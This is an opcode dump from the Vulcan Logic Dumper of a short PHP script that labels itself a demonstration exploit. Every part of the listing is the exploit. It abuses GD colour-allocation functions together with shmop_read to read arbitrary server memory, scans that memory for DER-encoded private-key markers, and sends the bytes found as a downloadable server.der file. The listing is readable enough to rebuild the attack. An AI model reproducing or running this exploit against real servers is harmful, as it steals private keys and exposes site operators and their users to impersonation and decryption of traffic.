Finding entry points
Branch analysis from position: 0
2 jumps found. (Code = 47) Position 1 = 5, Position 2 = 10
Branch analysis from position: 5
2 jumps found. (Code = 43) Position 1 = 11, Position 2 = 12
Branch analysis from position: 11
1 jumps found. (Code = 79) Position 1 = -2
Branch analysis from position: 12
1 jumps found. (Code = 42) Position 1 = 67
Branch analysis from position: 67
2 jumps found. (Code = 44) Position 1 = 68, Position 2 = 16
Branch analysis from position: 68
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 16
2 jumps found. (Code = 46) Position 1 = 28, Position 2 = 30
Branch analysis from position: 28
2 jumps found. (Code = 43) Position 1 = 31, Position 2 = 66
Branch analysis from position: 31
2 jumps found. (Code = 43) Position 1 = 39, Position 2 = 66
Branch analysis from position: 39
2 jumps found. (Code = 43) Position 1 = 65, Position 2 = 66
Branch analysis from position: 65
1 jumps found. (Code = 42) Position 1 = 68
Branch analysis from position: 68
Branch analysis from position: 66
2 jumps found. (Code = 44) Position 1 = 68, Position 2 = 16
Branch analysis from position: 68
Branch analysis from position: 16
Branch analysis from position: 66
Branch analysis from position: 66
Branch analysis from position: 30
Branch analysis from position: 10
filename:       /in/DTl4j
function name:  (null)
number of ops:  76
compiled vars:  !0 = $offset, !1 = $data, !2 = $position, !3 = $length, !4 = $keydata
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   17     0  E >   INIT_FCALL                                               'extension_loaded'
          1        SEND_VAL                                                 'gd'
          2        DO_ICALL                                         $5
          3        BOOL_NOT                                         ~6      $5
          4      > JMPNZ_EX                                         ~6      ~6, ->10
          5    >   INIT_FCALL                                               'extension_loaded'
          6        SEND_VAL                                                 'shmop'
          7        DO_ICALL                                         $7
          8        BOOL_NOT                                         ~8      $7
          9        BOOL                                             ~6      ~8
         10    > > JMPZ                                                     ~6, ->12
   18    11    > > EXIT                                                     'This+demonstration+exploit+only+works+with+ext%2Fgd+and+ext%2Fshmop+loaded.'
   40    12    >   INIT_FCALL                                               'init'
         13        DO_FCALL                                      0
   42    14        ASSIGN                                                   !0, 134578176
   44    15      > JMP                                                      ->67
   46    16    >   INIT_FCALL                                               'peek'
         17        SEND_VAR                                                 !0
         18        SEND_VAL                                                 1040
         19        DO_FCALL                                      0  $11
         20        ASSIGN                                                   !1, $11
   48    21        INIT_FCALL                                               'strpos'
         22        SEND_VAR                                                 !1
         23        SEND_VAL                                                 '0%82'
         24        DO_ICALL                                         $13
         25        ASSIGN                                                   !2, $13
   49    26        TYPE_CHECK                                 1018  ~15     !2
         27      > JMPZ_EX                                          ~15     ~15, ->30
         28    >   IS_SMALLER                                       ~16     !2, 1024
         29        BOOL                                             ~15     ~16
         30    > > JMPZ                                                     ~15, ->66
   51    31    >   INIT_FCALL                                               'substr'
         32        SEND_VAR                                                 !1
         33        ADD                                              ~17     !2, 4
         34        SEND_VAL                                                 ~17
         35        SEND_VAL                                                 4
         36        DO_ICALL                                         $18
         37        IS_EQUAL                                                 $18, '%02%01%00%02'
         38      > JMPZ                                                     ~19, ->66
   52    39    >   INIT_FCALL                                               'ord'
         40        ADD                                              ~20     !2, 2
         41        FETCH_DIM_R                                      ~21     !1, ~20
         42        SEND_VAL                                                 ~21
         43        DO_ICALL                                         $22
         44        MUL                                              ~23     $22, 256
         45        INIT_FCALL                                               'ord'
         46        ADD                                              ~24     !2, 3
         47        FETCH_DIM_R                                      ~25     !1, ~24
         48        SEND_VAL                                                 ~25
         49        DO_ICALL                                         $26
         50        ADD                                              ~27     ~23, $26
         51        ADD                                              ~28     ~27, 4
         52        ASSIGN                                                   !3, ~28
   53    53        INIT_FCALL                                               'peek'
         54        ADD                                              ~30     !0, !2
         55        SEND_VAL                                                 ~30
         56        SEND_VAR                                                 !3
         57        DO_FCALL                                      0  $31
         58        ASSIGN                                                   !4, $31
   55    59        INIT_FCALL                                               'strpos'
         60        SEND_VAR                                                 !4
         61        SEND_VAL                                                 '%01%00%01'
         62        DO_ICALL                                         $33
         63        IS_SMALLER                                               0, $33
         64      > JMPZ                                                     ~34, ->66
   56    65    > > JMP                                                      ->68
   59    66    >   ASSIGN_OP                                     1          !0, 1024
   44    67    > > JMPNZ                                                    1, ->16
   62    68    >   INIT_FCALL                                               'header'
         69        SEND_VAL                                                 'Content-type%3A+application%2Foctet-stream'
         70        DO_ICALL
   63    71        INIT_FCALL                                               'header'
         72        SEND_VAL                                                 'Content-Disposition%3A+attachment%3B+filename%3D%22server.der%22'
         73        DO_ICALL
   64    74        ECHO                                                     !4
   65    75      > RETURN                                                   1

Function init:
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 62) Position 1 = -2
filename:       /in/DTl4j
function name:  init
number of ops:  19
compiled vars:  !0 = $rid
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   23     0  E >   BIND_GLOBAL                                              !0, 'rid'
   25     1        INIT_FCALL_BY_NAME                                       'imagecreate'
          2        SEND_VAL_EX                                              10
          3        SEND_VAL_EX                                              10
          4        DO_FCALL                                      0  $1
          5        ASSIGN                                                   !0, $1
   26     6        INIT_FCALL_BY_NAME                                       'imagecolorallocate'
          7        SEND_VAR_EX                                              !0
          8        SEND_VAL_EX                                              0
          9        SEND_VAL_EX                                              0
         10        SEND_VAL_EX                                              0
         11        DO_FCALL                                      0
   27    12        INIT_FCALL_BY_NAME                                       'imagecolorallocate'
         13        SEND_VAR_EX                                              !0
         14        SEND_VAL_EX                                              0
         15        SEND_VAL_EX                                              0
         16        SEND_VAL_EX                                              0
         17        DO_FCALL                                      0
   28    18      > RETURN                                                   null

End of function init

Function peek:
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 62) Position 1 = -2
filename:       /in/DTl4j
function name:  peek
number of ops:  31
compiled vars:  !0 = $addr, !1 = $size, !2 = $rid
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   30     0  E >   RECV                                             !0
          1        RECV                                             !1
   32     2        BIND_GLOBAL                                              !2, 'rid'
   33     3        INIT_FCALL_BY_NAME                                       'imagecolordeallocate'
          4        SEND_VAR_EX                                              !2
          5        SEND_VAL_EX                                              0
          6        DO_FCALL                                      0
   34     7        INIT_FCALL_BY_NAME                                       'imagecolordeallocate'
          8        SEND_VAR_EX                                              !2
          9        SEND_VAL_EX                                              1
         10        DO_FCALL                                      0
   35    11        INIT_FCALL_BY_NAME                                       'imagecolorallocate'
         12        SEND_VAR_EX                                              !2
         13        SEND_VAR_EX                                              !0
         14        SEND_VAL_EX                                              0
         15        SEND_VAL_EX                                              0
         16        DO_FCALL                                      0
   36    17        INIT_FCALL_BY_NAME                                       'imagecolorallocate'
         18        SEND_VAR_EX                                              !2
         19        SEND_VAR_EX                                              !1
         20        SEND_VAL_EX                                              0
         21        SEND_VAL_EX                                              0
         22        DO_FCALL                                      0
   37    23        INIT_FCALL_BY_NAME                                       'shmop_read'
         24        CAST                                          4  ~7      !2
         25        SEND_VAL_EX                                              ~7
         26        SEND_VAL_EX                                              0
         27        SEND_VAR_EX                                              !1
         28        DO_FCALL                                      0  $8
         29      > RETURN                                                   $8
   38    30*     > RETURN                                                   null

End of function peek
Generated using Vulcan Logic Dumper, using php 8.0.0